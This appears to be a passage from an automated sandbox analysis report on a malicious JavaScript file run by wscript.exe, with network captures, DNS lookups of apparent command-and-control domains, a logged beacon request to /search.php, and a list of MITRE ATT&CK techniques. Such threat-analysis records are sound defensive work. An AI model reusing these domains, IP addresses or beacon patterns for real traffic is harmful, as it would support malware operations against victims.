Jan 9, 2025 13:43:37.450098038 CET	443	64781	86.107.32.28	192.168.2.5
Jan 9, 2025 13:43:37.450364113 CET	64781	443	192.168.2.5	86.107.32.28
Jan 9, 2025 13:43:37.450572968 CET	64781	443	192.168.2.5	86.107.32.28
Jan 9, 2025 13:43:37.450599909 CET	443	64781	86.107.32.28	192.168.2.5
Jan 9, 2025 13:43:37.712656975 CET	64781	443	192.168.2.5	86.107.32.28

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 13:41:09.419450045 CET	53	54730	162.159.36.2	192.168.2.5
Jan 9, 2025 13:41:09.942955017 CET	59569	53	192.168.2.5	1.1.1.1
Jan 9, 2025 13:41:09.950124979 CET	53	59569	1.1.1.1	192.168.2.5
Jan 9, 2025 13:43:13.725763083 CET	56961	53	192.168.2.5	1.1.1.1
Jan 9, 2025 13:43:13.812928915 CET	53	56961	1.1.1.1	192.168.2.5
Jan 9, 2025 13:43:37.366251945 CET	63804	53	192.168.2.5	1.1.1.1
Jan 9, 2025 13:43:37.447720051 CET	53	63804	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 13:41:09.942955017 CET	192.168.2.5	1.1.1.1	0x1e76	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 9, 2025 13:43:13.725763083 CET	192.168.2.5	1.1.1.1	0x7448	Standard query (0)	www.giuseppedeluigi.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:43:37.366251945 CET	192.168.2.5	1.1.1.1	0x1e4f	Standard query (0)	www.frerecapucinbenin.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 13:41:09.950124979 CET	1.1.1.1	192.168.2.5	0x1e76	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 9, 2025 13:43:13.812928915 CET	1.1.1.1	192.168.2.5	0x7448	No error (0)	www.giuseppedeluigi.com		188.40.120.141	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:43:37.447720051 CET	1.1.1.1	192.168.2.5	0x1e4f	No error (0)	www.frerecapucinbenin.org	frerecapucinbenin.org		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:43:37.447720051 CET	1.1.1.1	192.168.2.5	0x1e4f	No error (0)	frerecapucinbenin.org		86.107.32.28	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.giuseppedeluigi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	64780	188.40.120.141	443	4148	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:43:14 UTC	224	OUT	GET /search.php?xxcktjjjheggcyu=9137952416303845 HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: www.giuseppedeluigi.com
2025-01-09 12:43:15 UTC	193	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 12:43:15 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 208 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-09 12:43:15 UTC	208	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 61 72 63 68 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /search.php was not found on this server.</p></body></html>

Target ID:	0
Start time:	07:40:34
Start date:	09/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js"
Imagebase:	0x7ff7c1110000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
Tactics:	Persistence
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report digitalisierungskonzept_muster.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: wscript.exePID: 4148, Parent PID: 1028

General

Chronological Activities

Disassembly

Windows Analysis Report
digitalisierungskonzept_muster.js